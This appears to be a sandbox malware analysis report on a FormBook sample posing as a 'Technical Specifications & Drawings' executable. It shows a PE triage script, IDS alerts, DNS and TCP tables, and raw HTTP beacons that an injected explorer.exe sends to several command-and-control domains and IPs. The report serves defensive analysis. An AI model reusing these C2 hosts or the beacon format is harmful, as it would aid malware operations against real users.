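    jmp_via_iat = (len(stub) == 6 and stub[:2] == b"\xff\x25"
                   and struct.unpack("<I", stub[2:])[0] - pe["image_base"] == iat_rva)
    return {"section_entropy": entropy, "is_dotnet": clr_size > 0, "entry_jmp_via_iat": jmp_via_iat,
            "suspect_sections": [n for n, e in entropy.items() if e > packed_threshold]}


if __name__ == "__main__":
    print(triage(build_sample_pe()))
```

On the real sample the same three checks would fire the same way: a .text section with entropy 7.78 and an almost empty .rsrc/.reloc, a CLR header, and an entry stub that resolves to the IAT. That combination is not proof of malice on its own (obfuscated commercial .NET software looks similar), but together with the single mscoree import it says that everything interesting is decrypted at run time, which is why the sandbox's memory dumps, not the file on disk, carry the FormBook payload.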
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
08/08/22-12:28:44.161490 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49803 | 80 | 192.168.2.3 | 67.23.226.119
08/08/22-12:28:44.161490 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49803 | 80 | 192.168.2.3 | 67.23.226.119
08/08/22-12:28:49.631208 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49809 | 80 | 192.168.2.3 | 67.223.117.72
08/08/22-12:28:49.631208 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49809 | 80 | 192.168.2.3 | 67.223.117.72
08/08/22-12:28:49.631208 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49809 | 80 | 192.168.2.3 | 67.223.117.72
08/08/22-12:28:44.161490 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49803 | 80 | 192.168.2.3 | 67.23.226.119
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 8, 2022 12:28:32.463253975 CEST | 49776 | 80 | 192.168.2.3 | 107.155.208.43
Aug 8, 2022 12:28:32.755367041 CEST | 80 | 49776 | 107.155.208.43 | 192.168.2.3
Aug 8, 2022 12:28:32.755527020 CEST | 49776 | 80 | 192.168.2.3 | 107.155.208.43
Aug 8, 2022 12:28:32.786432028 CEST | 49776 | 80 | 192.168.2.3 | 107.155.208.43
Aug 8, 2022 12:28:33.078504086 CEST | 80 | 49776 | 107.155.208.43 | 192.168.2.3
Aug 8, 2022 12:28:33.078955889 CEST | 80 | 49776 | 107.155.208.43 | 192.168.2.3
Aug 8, 2022 12:28:33.078989983 CEST | 80 | 49776 | 107.155.208.43 | 192.168.2.3
Aug 8, 2022 12:28:33.079127073 CEST | 49776 | 80 | 192.168.2.3 | 107.155.208.43
Aug 8, 2022 12:28:33.302218914 CEST | 49776 | 80 | 192.168.2.3 | 107.155.208.43
Aug 8, 2022 12:28:33.595402002 CEST | 80 | 49776 | 107.155.208.43 | 192.168.2.3
Aug 8, 2022 12:28:38.335200071 CEST | 49780 | 80 | 192.168.2.3 | 109.234.162.62
Aug 8, 2022 12:28:38.365019083 CEST | 80 | 49780 | 109.234.162.62 | 192.168.2.3
Aug 8, 2022 12:28:38.365221024 CEST | 49780 | 80 | 192.168.2.3 | 109.234.162.62
Aug 8, 2022 12:28:38.365463018 CEST | 49780 | 80 | 192.168.2.3 | 109.234.162.62
Aug 8, 2022 12:28:38.395041943 CEST | 80 | 49780 | 109.234.162.62 | 192.168.2.3
Aug 8, 2022 12:28:38.864422083 CEST | 80 | 49780 | 109.234.162.62 | 192.168.2.3
Aug 8, 2022 12:28:38.864464045 CEST | 80 | 49780 | 109.234.162.62 | 192.168.2.3
Aug 8, 2022 12:28:38.864614010 CEST | 49780 | 80 | 192.168.2.3 | 109.234.162.62
Aug 8, 2022 12:28:38.864650965 CEST | 49780 | 80 | 192.168.2.3 | 109.234.162.62
Aug 8, 2022 12:28:38.894378901 CEST | 80 | 49780 | 109.234.162.62 | 192.168.2.3
Aug 8, 2022 12:28:44.019023895 CEST | 49803 | 80 | 192.168.2.3 | 67.23.226.119
Aug 8, 2022 12:28:44.154835939 CEST | 80 | 49803 | 67.23.226.119 | 192.168.2.3
Aug 8, 2022 12:28:44.157953978 CEST | 49803 | 80 | 192.168.2.3 | 67.23.226.119
Aug 8, 2022 12:28:44.161489964 CEST | 49803 | 80 | 192.168.2.3 | 67.23.226.119
Aug 8, 2022 12:28:44.297408104 CEST | 80 | 49803 | 67.23.226.119 | 192.168.2.3
Aug 8, 2022 12:28:44.300245047 CEST | 80 | 49803 | 67.23.226.119 | 192.168.2.3
Aug 8, 2022 12:28:44.300311089 CEST | 80 | 49803 | 67.23.226.119 | 192.168.2.3
Aug 8, 2022 12:28:44.300527096 CEST | 49803 | 80 | 192.168.2.3 | 67.23.226.119
Aug 8, 2022 12:28:44.300573111 CEST | 49803 | 80 | 192.168.2.3 | 67.23.226.119
Aug 8, 2022 12:28:44.436374903 CEST | 80 | 49803 | 67.23.226.119 | 192.168.2.3
Aug 8, 2022 12:28:49.458475113 CEST | 49809 | 80 | 192.168.2.3 | 67.223.117.72
Aug 8, 2022 12:28:49.628911018 CEST | 80 | 49809 | 67.223.117.72 | 192.168.2.3
Aug 8, 2022 12:28:49.631028891 CEST | 49809 | 80 | 192.168.2.3 | 67.223.117.72
Aug 8, 2022 12:28:49.631207943 CEST | 49809 | 80 | 192.168.2.3 | 67.223.117.72
Aug 8, 2022 12:28:49.801218033 CEST | 80 | 49809 | 67.223.117.72 | 192.168.2.3
Aug 8, 2022 12:28:49.902386904 CEST | 80 | 49809 | 67.223.117.72 | 192.168.2.3
Aug 8, 2022 12:28:49.902443886 CEST | 80 | 49809 | 67.223.117.72 | 192.168.2.3
Aug 8, 2022 12:28:49.902481079 CEST | 80 | 49809 | 67.223.117.72 | 192.168.2.3
Aug 8, 2022 12:28:49.902518988 CEST | 80 | 49809 | 67.223.117.72 | 192.168.2.3
Aug 8, 2022 12:28:49.902545929 CEST | 80 | 49809 | 67.223.117.72 | 192.168.2.3
Aug 8, 2022 12:28:49.902592897 CEST | 49809 | 80 | 192.168.2.3 | 67.223.117.72
Aug 8, 2022 12:28:49.902663946 CEST | 49809 | 80 | 192.168.2.3 | 67.223.117.72
Aug 8, 2022 12:28:51.640513897 CEST | 49809 | 80 | 192.168.2.3 | 67.223.117.72
Aug 8, 2022 12:28:51.810667992 CEST | 80 | 49809 | 67.223.117.72 | 192.168.2.3
Aug 8, 2022 12:29:01.721714973 CEST | 49817 | 80 | 192.168.2.3 | 184.168.107.80
Aug 8, 2022 12:29:01.971877098 CEST | 80 | 49817 | 184.168.107.80 | 192.168.2.3
Aug 8, 2022 12:29:01.972079039 CEST | 49817 | 80 | 192.168.2.3 | 184.168.107.80
Aug 8, 2022 12:29:01.972229004 CEST | 49817 | 80 | 192.168.2.3 | 184.168.107.80
Aug 8, 2022 12:29:01.972253084 CEST | 49817 | 80 | 192.168.2.3 | 184.168.107.80
Aug 8, 2022 12:29:01.972655058 CEST | 49818 | 80 | 192.168.2.3 | 184.168.107.80
Aug 8, 2022 12:29:02.222067118 CEST | 80 | 49817 | 184.168.107.80 | 192.168.2.3
Aug 8, 2022 12:29:02.227452040 CEST | 80 | 49818 | 184.168.107.80 | 192.168.2.3
Aug 8, 2022 12:29:02.227598906 CEST | 49818 | 80 | 192.168.2.3 | 184.168.107.80
Aug 8, 2022 12:29:02.227710009 CEST | 49818 | 80 | 192.168.2.3 | 184.168.107.80
Aug 8, 2022 12:29:02.232486010 CEST | 80 | 49817 | 184.168.107.80 | 192.168.2.3
Aug 8, 2022 12:29:02.232532978 CEST | 80 | 49817 | 184.168.107.80 | 192.168.2.3
Aug 8, 2022 12:29:02.232578039 CEST | 49817 | 80 | 192.168.2.3 | 184.168.107.80
Aug 8, 2022 12:29:02.232604027 CEST | 49817 | 80 | 192.168.2.3 | 184.168.107.80
Aug 8, 2022 12:29:02.482373953 CEST | 80 | 49818 | 184.168.107.80 | 192.168.2.3
Aug 8, 2022 12:29:02.489057064 CEST | 80 | 49818 | 184.168.107.80 | 192.168.2.3
Aug 8, 2022 12:29:02.489123106 CEST | 80 | 49818 | 184.168.107.80 | 192.168.2.3
Aug 8, 2022 12:29:02.489309072 CEST | 49818 | 80 | 192.168.2.3 | 184.168.107.80
Aug 8, 2022 12:29:02.489403963 CEST | 49818 | 80 | 192.168.2.3 | 184.168.107.80
Aug 8, 2022 12:29:02.744102001 CEST | 80 | 49818 | 184.168.107.80 | 192.168.2.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 8, 2022 12:28:32.168889046 CEST | 52985 | 53 | 192.168.2.3 | 8.8.8.8
Aug 8, 2022 12:28:32.449382067 CEST | 53 | 52985 | 8.8.8.8 | 192.168.2.3
Aug 8, 2022 12:28:38.314755917 CEST | 52810 | 53 | 192.168.2.3 | 8.8.8.8
Aug 8, 2022 12:28:38.334137917 CEST | 53 | 52810 | 8.8.8.8 | 192.168.2.3
Aug 8, 2022 12:28:43.877885103 CEST | 55151 | 53 | 192.168.2.3 | 8.8.8.8
Aug 8, 2022 12:28:44.018109083 CEST | 53 | 55151 | 8.8.8.8 | 192.168.2.3
Aug 8, 2022 12:28:49.332912922 CEST | 64816 | 53 | 192.168.2.3 | 8.8.8.8
Aug 8, 2022 12:28:49.456350088 CEST | 53 | 64816 | 8.8.8.8 | 192.168.2.3
Aug 8, 2022 12:29:01.681569099 CEST | 49723 | 53 | 192.168.2.3 | 8.8.8.8
Aug 8, 2022 12:29:01.719481945 CEST | 53 | 49723 | 8.8.8.8 | 192.168.2.3
Aug 8, 2022 12:29:07.523072958 CEST | 52581 | 53 | 192.168.2.3 | 8.8.8.8
Aug 8, 2022 12:29:08.532000065 CEST | 52581 | 53 | 192.168.2.3 | 8.8.8.8
Aug 8, 2022 12:29:09.578977108 CEST | 52581 | 53 | 192.168.2.3 | 8.8.8.8
Aug 8, 2022 12:29:11.663458109 CEST | 52581 | 53 | 192.168.2.3 | 8.8.8.8
Aug 8, 2022 12:29:12.542298079 CEST | 53 | 52581 | 8.8.8.8 | 192.168.2.3
Aug 8, 2022 12:29:12.571427107 CEST | 50152 | 53 | 192.168.2.3 | 8.8.8.8
Aug 8, 2022 12:29:13.551590919 CEST | 53 | 52581 | 8.8.8.8 | 192.168.2.3
Aug 8, 2022 12:29:13.579313993 CEST | 50152 | 53 | 192.168.2.3 | 8.8.8.8
Aug 8, 2022 12:29:14.594968081 CEST | 50152 | 53 | 192.168.2.3 | 8.8.8.8
Aug 8, 2022 12:29:14.598031998 CEST | 53 | 52581 | 8.8.8.8 | 192.168.2.3
Aug 8, 2022 12:29:16.610747099 CEST | 50152 | 53 | 192.168.2.3 | 8.8.8.8
Aug 8, 2022 12:29:16.682765961 CEST | 53 | 52581 | 8.8.8.8 | 192.168.2.3
Aug 8, 2022 12:29:17.592346907 CEST | 53 | 50152 | 8.8.8.8 | 192.168.2.3
Aug 8, 2022 12:29:18.598768950 CEST | 53 | 50152 | 8.8.8.8 | 192.168.2.3
Aug 8, 2022 12:29:19.614202976 CEST | 53 | 50152 | 8.8.8.8 | 192.168.2.3
Aug 8, 2022 12:29:21.629395008 CEST | 53 | 50152 | 8.8.8.8 | 192.168.2.3
Aug 8, 2022 12:29:22.596843958 CEST | 56639 | 53 | 192.168.2.3 | 8.8.8.8
Aug 8, 2022 12:29:22.630506992 CEST | 53 | 56639 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Aug 8, 2022 12:29:13.551677942 CEST | 192.168.2.3 | 8.8.8.8 | cff9 | (Port unreachable) | Destination Unreachable
Aug 8, 2022 12:29:14.598773003 CEST | 192.168.2.3 | 8.8.8.8 | cff9 | (Port unreachable) | Destination Unreachable
Aug 8, 2022 12:29:16.682864904 CEST | 192.168.2.3 | 8.8.8.8 | cff9 | (Port unreachable) | Destination Unreachable
Aug 8, 2022 12:29:18.598884106 CEST | 192.168.2.3 | 8.8.8.8 | cff9 | (Port unreachable) | Destination Unreachable
Aug 8, 2022 12:29:19.614459038 CEST | 192.168.2.3 | 8.8.8.8 | cff9 | (Port unreachable) | Destination Unreachable
Aug 8, 2022 12:29:21.629515886 CEST | 192.168.2.3 | 8.8.8.8 | cff9 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 8, 2022 12:28:32.168889046 CEST | 192.168.2.3 | 8.8.8.8 | 0x260e | Standard query (0) | www.kirchhoff-darryl.com | A (IP address) | IN (0x0001)
Aug 8, 2022 12:28:38.314755917 CEST | 192.168.2.3 | 8.8.8.8 | 0x93ae | Standard query (0) | www.tomoptique.fr | A (IP address) | IN (0x0001)
Aug 8, 2022 12:28:43.877885103 CEST | 192.168.2.3 | 8.8.8.8 | 0xd4b1 | Standard query (0) | www.boshi-eg.online | A (IP address) | IN (0x0001)
Aug 8, 2022 12:28:49.332912922 CEST | 192.168.2.3 | 8.8.8.8 | 0x603 | Standard query (0) | www.esandcraic.com | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:01.681569099 CEST | 192.168.2.3 | 8.8.8.8 | 0x7af8 | Standard query (0) | www.mexc-event-partner.site | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:07.523072958 CEST | 192.168.2.3 | 8.8.8.8 | 0x6d06 | Standard query (0) | www.gzkanglongkeji.com | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:08.532000065 CEST | 192.168.2.3 | 8.8.8.8 | 0x6d06 | Standard query (0) | www.gzkanglongkeji.com | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:09.578977108 CEST | 192.168.2.3 | 8.8.8.8 | 0x6d06 | Standard query (0) | www.gzkanglongkeji.com | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:11.663458109 CEST | 192.168.2.3 | 8.8.8.8 | 0x6d06 | Standard query (0) | www.gzkanglongkeji.com | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:12.571427107 CEST | 192.168.2.3 | 8.8.8.8 | 0x4d10 | Standard query (0) | www.gzkanglongkeji.com | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:13.579313993 CEST | 192.168.2.3 | 8.8.8.8 | 0x4d10 | Standard query (0) | www.gzkanglongkeji.com | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:14.594968081 CEST | 192.168.2.3 | 8.8.8.8 | 0x4d10 | Standard query (0) | www.gzkanglongkeji.com | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:16.610747099 CEST | 192.168.2.3 | 8.8.8.8 | 0x4d10 | Standard query (0) | www.gzkanglongkeji.com | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:22.596843958 CEST | 192.168.2.3 | 8.8.8.8 | 0xdf98 | Standard query (0) | www.fundycases.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 8, 2022 12:28:32.449382067 CEST | 8.8.8.8 | 192.168.2.3 | 0x260e | No error (0) | www.kirchhoff-darryl.com | | 107.155.208.43 | A (IP address) | IN (0x0001)
Aug 8, 2022 12:28:38.334137917 CEST | 8.8.8.8 | 192.168.2.3 | 0x93ae | No error (0) | www.tomoptique.fr | tomoptique.fr | | CNAME (Canonical name) | IN (0x0001)
Aug 8, 2022 12:28:38.334137917 CEST | 8.8.8.8 | 192.168.2.3 | 0x93ae | No error (0) | tomoptique.fr | | 109.234.162.62 | A (IP address) | IN (0x0001)
Aug 8, 2022 12:28:44.018109083 CEST | 8.8.8.8 | 192.168.2.3 | 0xd4b1 | No error (0) | www.boshi-eg.online | boshi-eg.online | | CNAME (Canonical name) | IN (0x0001)
Aug 8, 2022 12:28:44.018109083 CEST | 8.8.8.8 | 192.168.2.3 | 0xd4b1 | No error (0) | boshi-eg.online | | 67.23.226.119 | A (IP address) | IN (0x0001)
Aug 8, 2022 12:28:49.456350088 CEST | 8.8.8.8 | 192.168.2.3 | 0x603 | No error (0) | www.esandcraic.com | | 67.223.117.72 | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:01.719481945 CEST | 8.8.8.8 | 192.168.2.3 | 0x7af8 | No error (0) | www.mexc-event-partner.site | mexc-event-partner.site | | CNAME (Canonical name) | IN (0x0001)
Aug 8, 2022 12:29:01.719481945 CEST | 8.8.8.8 | 192.168.2.3 | 0x7af8 | No error (0) | mexc-event-partner.site | | 184.168.107.80 | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:12.542298079 CEST | 8.8.8.8 | 192.168.2.3 | 0x6d06 | Server failure (2) | www.gzkanglongkeji.com | none | none | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:13.551590919 CEST | 8.8.8.8 | 192.168.2.3 | 0x6d06 | Server failure (2) | www.gzkanglongkeji.com | none | none | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:14.598031998 CEST | 8.8.8.8 | 192.168.2.3 | 0x6d06 | Server failure (2) | www.gzkanglongkeji.com | none | none | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:16.682765961 CEST | 8.8.8.8 | 192.168.2.3 | 0x6d06 | Server failure (2) | www.gzkanglongkeji.com | none | none | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:17.592346907 CEST | 8.8.8.8 | 192.168.2.3 | 0x4d10 | Server failure (2) | www.gzkanglongkeji.com | none | none | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:18.598768950 CEST | 8.8.8.8 | 192.168.2.3 | 0x4d10 | Server failure (2) | www.gzkanglongkeji.com | none | none | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:19.614202976 CEST | 8.8.8.8 | 192.168.2.3 | 0x4d10 | Server failure (2) | www.gzkanglongkeji.com | none | none | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:21.629395008 CEST | 8.8.8.8 | 192.168.2.3 | 0x4d10 | Server failure (2) | www.gzkanglongkeji.com | none | none | A (IP address) | IN (0x0001)
Aug 8, 2022 12:29:22.630506992 CEST | 8.8.8.8 | 192.168.2.3 | 0xdf98 | No error (0) | www.fundycases.com | gcdn0.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Aug 8, 2022 12:29:22.630506992 CEST | 8.8.8.8 | 192.168.2.3 | 0xdf98 | No error (0) | gcdn0.wixdns.net | balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Aug 8, 2022 12:29:22.630506992 CEST | 8.8.8.8 | 192.168.2.3 | 0xdf98 | No error (0) | balancer.wixdns.net | 5f36b111-balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Aug 8, 2022 12:29:22.630506992 CEST | 8.8.8.8 | 192.168.2.3 | 0xdf98 | No error (0) | 5f36b111-balancer.wixdns.net | td-balancer-199-15-163-148.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Aug 8, 2022 12:29:22.630506992 CEST | 8.8.8.8 | 192.168.2.3 | 0xdf98 | No error (0) | td-balancer-199-15-163-148.wixdns.net | | 199.15.163.148 | A (IP address) | IN (0x0001)
                                                • www.kirchhoff-darryl.com
                                                • www.tomoptique.fr
                                                • www.boshi-eg.online
                                                • www.esandcraic.com
                                                • www.mexc-event-partner.site
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49776 | 107.155.208.43 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 8, 2022 12:28:32.786432028 CEST | 7566 | OUT | GET /02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_ HTTP/1.1
                                                Host: www.kirchhoff-darryl.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
Aug 8, 2022 12:28:33.078955889 CEST | 7566 | IN | HTTP/1.1 301 Moved Permanently
                                                Date: Mon, 08 Aug 2022 10:28:32 GMT
                                                Server: Apache/2.2.15 (CentOS)
                                                Location: http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_
                                                Content-Length: 457
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&amp;wRtdp=ETVPg0_">here</a>.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.kirchhoff-darryl.com Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49780 | 109.234.162.62 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 8, 2022 12:28:38.365463018 CEST | 7583 | OUT | GET /02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_ HTTP/1.1
                                                Host: www.tomoptique.fr
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
Aug 8, 2022 12:28:38.864422083 CEST | 7587 | IN | HTTP/1.1 301 Moved Permanently
                                                Date: Mon, 08 Aug 2022 10:28:38 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 0
                                                Connection: close
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: http://tomoptique.fr/02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_
                                                Server: o2switch-PowerBoost-v3


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49803 | 67.23.226.119 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 8, 2022 12:28:44.161489964 CEST | 7676 | OUT | GET /02pi/?ZL0=4npjF3s9G6uWNp4ceBGqcNUcjkX96JEG8J4d3OAuWw45Kxpl9gSb2BHY5Eg4Nc6InaukRaYVJuT4y0aleUHPUlqgoOBFmRDZHQ==&wRtdp=ETVPg0_ HTTP/1.1
                                                Host: www.boshi-eg.online
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
Aug 8, 2022 12:28:44.300245047 CEST | 7677 | IN | HTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 10:28:44 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49809 | 67.223.117.72 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 8, 2022 12:28:49.631207943 CEST | 7769 | OUT | GET /02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_ HTTP/1.1
                                                Host: www.esandcraic.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
Aug 8, 2022 12:28:49.902386904 CEST | 7770 | IN | HTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 10:28:49 GMT
                                                Server: Apache
                                                Content-Length: 5278
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-12.46 2.34-23.88 7.01-34.27 4.67


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49817 | 184.168.107.80 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 8, 2022 12:29:01.972229004 CEST | 8097 | OUT | POST /02pi/ HTTP/1.1
                                                Host: www.mexc-event-partner.site
                                                Connection: close
                                                Content-Length: 409
                                                Cache-Control: no-cache
                                                Origin: http://www.mexc-event-partner.site
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.mexc-event-partner.site/02pi/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Ascii: ZL0=DvykYhWIM5LBJjMPjTucbWmUDGjsf2FOrSdHWp4Ga3thfj8uy_TxYGSDu3bL9Bzb9GWptyFcbupioho2mZQVwZ~Eb5BQqdCxfroxBIbp9DGuC1Z0iRzIMSzz2xCwmvaRN1zIbDPIM_br136kmz95NgabUQJ1kPcbAUqc7UER2sHQUfFeZFOz5NN5zhkJkPk5WS7j(GRBAqIzdtxBTrF96Lw-W2cRf2cWt1(_KCTce5tCvdYSE_o6Y1Y-AyECO6nsfnqr9M54mDyo9GqfOHlX7tAAz2QJqQAc3RIOE-BdqJHli7khAlEOmhjr57kqnNUonNfOQpHCXygqfXghw4qRVGla8PPWZcLl~8eDrRWyHJYp0SJAVYlvm333loO-kkT-ciWRy6T5zQyqRoDLmA).
Aug 8, 2022 12:29:02.232486010 CEST | 8099 | IN | HTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 10:29:02 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49818 | 184.168.107.80 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 8, 2022 12:29:02.227710009 CEST | 8098 | OUT | GET /02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_ HTTP/1.1
                                                Host: www.mexc-event-partner.site
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
Aug 8, 2022 12:29:02.489057064 CEST | 8100 | IN | HTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 10:29:02 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Target ID: 0
Start time: 12:27:07
Start date: 08/08/2022
Path: C:\Users\user\Desktop\Technical Specifications & Drawings.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Technical Specifications & Drawings.exe"
Imagebase: 0x400000
File size: 800256 bytes
MD5 hash: 9B94F751E8CC145058DB9F428C2AD571
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.264997908.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
